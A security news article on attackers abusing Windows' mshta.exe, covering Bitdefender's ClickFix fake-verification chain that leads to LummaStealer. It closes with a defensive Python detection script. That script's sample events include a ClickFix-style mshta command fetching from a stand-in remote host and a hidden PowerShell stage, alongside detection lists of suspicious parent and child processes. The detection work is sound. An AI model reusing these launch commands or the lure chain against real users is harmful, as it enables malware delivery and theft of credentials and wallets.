
MSHTA Won’t Die, and Attackers Know It

Attackers continue abusing Microsoft’s decades-old MSHTA utility, exposing a familiar Windows problem: Legacy components often stay active because removing them could break something.

Attackers are still abusing Microsoft’s legacy MSHTA utility to deliver malware, according to new Bitdefender research. But the bigger issue is not MSHTA itself, an aging Windows component. It is the pattern security teams keep running into: old tools, still trusted, still enabled and still useful to attackers.

MSHTA (mshta.exe) was designed to run Microsoft HTML Applications, HTML files that carry JScript or VBScript and run outside the browser sandbox. Because it still ships with Windows, including Windows 11, runs as a legitimate Microsoft-signed binary and blends into normal system activity, attackers have repeatedly used it as a delivery and execution tool.

Bitdefender said both consumers and enterprises are at risk. Successful attacks can lead to stolen passwords, hijacked browser sessions, drained cryptocurrency wallets and, in more advanced cases, persistent access to compromised machines.

Because MSHTA is not a vulnerability, there is no patch to apply. It is a built-in Windows feature being abused as designed. MITRE has tracked MSHTA abuse for years as ATT&CK technique T1218.005 (System Binary Proxy Execution: Mshta).

Microsoft has responded with controls, not removal. The company recommends blocking outbound mshta.exe connections, monitoring MSHTA activity and moving legitimate HTA applications to modern alternatives such as Progressive Web Apps or Microsoft Edge WebView2. It has not announced a deprecation timeline for MSHTA.

Legit app, illicit use

The abuse of legit platform tools for nefarious ends isn’t new. Security practitioners call this living off the land. Instead of bringing obvious malware tools into an environment, attackers abuse legitimate operating system components already installed there. PowerShell, Office macros, Windows Management Instrumentation, PsExec and other trusted tools have all followed similar arcs.

MSHTA sits in the same category: old enough to escape regular scrutiny, but still functional enough to create real risk.

Legitimate uses remain: IT teams use MSHTA to display pop-up notifications or run simple scripts without opening a full browser window. Bitdefender said about 10% of its MSHTA telemetry still consists of simple administrative one-liners.

MSHTA bull’s-eye

That legitimate use is also what makes MSHTA attractive to attackers. It runs script code, can fetch its HTA from a remote server rather than a local file and executes in memory, leaving little on disk for file-based scanning to catch.

One Bitdefender example shows MSHTA used in a fake verification scheme, the lure family commonly called ClickFix. The victim lands on a page that looks like a reCAPTCHA check. The page silently copies a malicious command to the clipboard, then tells the user to press Windows + R, paste the command and press Enter.

That command launches mshta.exe, which reaches out to a remote server and runs a hidden HTA script. The script then hands off to PowerShell, which downloads and runs the final malware in memory. In Bitdefender’s example, the final payload was LummaStealer, a commodity information stealer used to grab passwords, browser data, session tokens and cryptocurrency-related data.

“What may begin as the execution of a seemingly innocuous legacy Windows utility can quickly lead to account theft, financial fraud, data loss, or broader infection of the affected system,” said Janos Gergo Szeles, senior software engineer at Bitdefender.

Abuse of MSHTA has a long history. MITRE links the technique to nation-state groups including Kimsuky, Lazarus Group and MuddyWater; financially motivated crews including FIN7 and APT38; and malware families including LummaStealer, WhisperGate, BabyShark and Koadic. MITRE’s mitigation guidance is direct: Block mshta.exe execution where possible using Windows Defender Application Control or AppLocker.

What defenders should do

Bitdefender recommends organizations audit whether MSHTA is in active use in their environment and disable or restrict it where it is not.

Because roughly 10 percent of real-world MSHTA activity is still legitimate administrative use, blanket blocking requires care. Defenders need to distinguish malicious mshta.exe invocations from benign ones, which typically means monitoring command-line arguments for remote URLs, watching for unusual parent processes and flagging hand-offs to child interpreters such as PowerShell, as in the chain above.
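The ClickFix chain described earlier and the triage guidance in this section both come down to the same question: which mshta.exe launches carry the signs of abuse (remote URL in the command line, odd parent, hand-off to PowerShell) and which look like the administrative one-liners Bitdefender still sees? The script below is an added example, not Bitdefender's or Microsoft's code. It assumes process-creation records in the style of Sysmon Event ID 1 have already been parsed into `ProcEvent` objects (a hypothetical structure for this example), and the list of suspicious parents and second-stage children is an assumption to tune per environment. The sample events are constructed for illustration, not real telemetry.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Remote locations mshta.exe can be pointed at: http(s)/ftp URLs and UNC paths.
REMOTE_RE = re.compile(r"""(?:https?|ftp)://[^\s"']+|\\\\[^\s"'\\]+\\[^\s"']+""", re.I)
# Inline script handed to mshta.exe through a protocol handler instead of an .hta file.
INLINE_RE = re.compile(r"\b(?:javascript|vbscript|about):", re.I)
# Parents that should not normally be starting mshta.exe (assumed list for this example).
SUSPICIOUS_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "winword.exe",
                      "excel.exe", "outlook.exe", "wscript.exe", "cscript.exe"}
# Children that show mshta.exe handing off to a second-stage interpreter.
STAGE2_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """Minimal view of a process-creation record (Sysmon Event ID 1 style). Hypothetical."""
    pid: int
    parent_pid: int
    image: str         # full path of the new process
    parent_image: str  # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_mshta(ev: ProcEvent, children: list[ProcEvent]) -> tuple[str, list[str]]:
    """Classify one mshta.exe launch as 'high', 'review' or 'benign', with reasons."""
    reasons: list[str] = []
    remote = bool(REMOTE_RE.search(ev.command_line))
    if remote:
        reasons.append("remote URL or UNC path in command line")
    parent = basename(ev.parent_image)
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {parent}")
    if INLINE_RE.search(ev.command_line):
        reasons.append("inline script via protocol handler")
    handoff = sorted({basename(c.image) for c in children} & STAGE2_CHILDREN)
    if handoff:
        reasons.append("spawned " + ", ".join(handoff))
    # Remote content or a browser/Office parent is enough on its own; the rest needs a human look.
    if remote or parent in SUSPICIOUS_PARENTS:
        return "high", reasons
    return ("review" if reasons else "benign"), reasons


def triage(events: list[ProcEvent]) -> dict[int, tuple[str, list[str]]]:
    """Score every mshta.exe launch in a batch of events, keyed by pid."""
    by_parent: dict[int, list[ProcEvent]] = {}
    for ev in events:
        by_parent.setdefault(ev.parent_pid, []).append(ev)
    return {ev.pid: score_mshta(ev, by_parent.get(ev.pid, []))
            for ev in events if basename(ev.image) == "mshta.exe"}


def audit_summary(results: dict[int, tuple[str, list[str]]]) -> Counter:
    """Count verdicts: the 'is MSHTA actually in use here, and how?' question."""
    return Counter(verdict for verdict, _ in results.values())


SAMPLE_EVENTS = [  # constructed records for this example, not real telemetry
    # ClickFix: pasted into the Win+R dialog, so explorer.exe is the parent
    ProcEvent(4100, 1200, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r"mshta https://example.invalid/verify"),
    # second stage launched by the fetched HTA
    ProcEvent(4120, 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              r'powershell.exe -NoProfile -WindowStyle Hidden -Command "<stage 2 omitted>"'),
    # admin one-liner: local notification HTA run from a scheduled batch file
    ProcEvent(5200, 5100, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
              r"mshta.exe C:\ProgramData\IT\maintenance-notice.hta"),
    # downloaded HTA opened straight from the browser
    ProcEvent(6000, 5900, r"C:\Windows\System32\mshta.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"mshta.exe C:\Users\alice\Downloads\invoice.hta"),
    # inline VBScript pop-up: plausible admin use, but worth a look
    ProcEvent(7000, 6900, r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'mshta.exe vbscript:Execute("MsgBox ""Reboot at 18:00"":close")'),
]

if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS)
    for pid, (verdict, reasons) in results.items():
        print(f"pid {pid}: {verdict:6} {'; '.join(reasons) or '-'}")
    print(dict(audit_summary(results)))
```

Run against the constructed sample, the ClickFix launch and the browser-spawned HTA come back as `high`, the local notification HTA as `benign`, and the inline VBScript pop-up as `review`. The `audit_summary` tallies are the starting point for the audit Bitdefender recommends: if a fleet-wide run shows nothing but `benign` local HTA paths, a WDAC or AppLocker block is low-risk; if it shows a steady stream of one-liners, those need an allow-list (or migration to the alternatives Microsoft names) before the block goes in.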

The firm also recommends layered technical controls and user awareness training targeting ClickFix-style lures specifically, given how consistently social engineering serves as the entry point across the campaigns it documented.
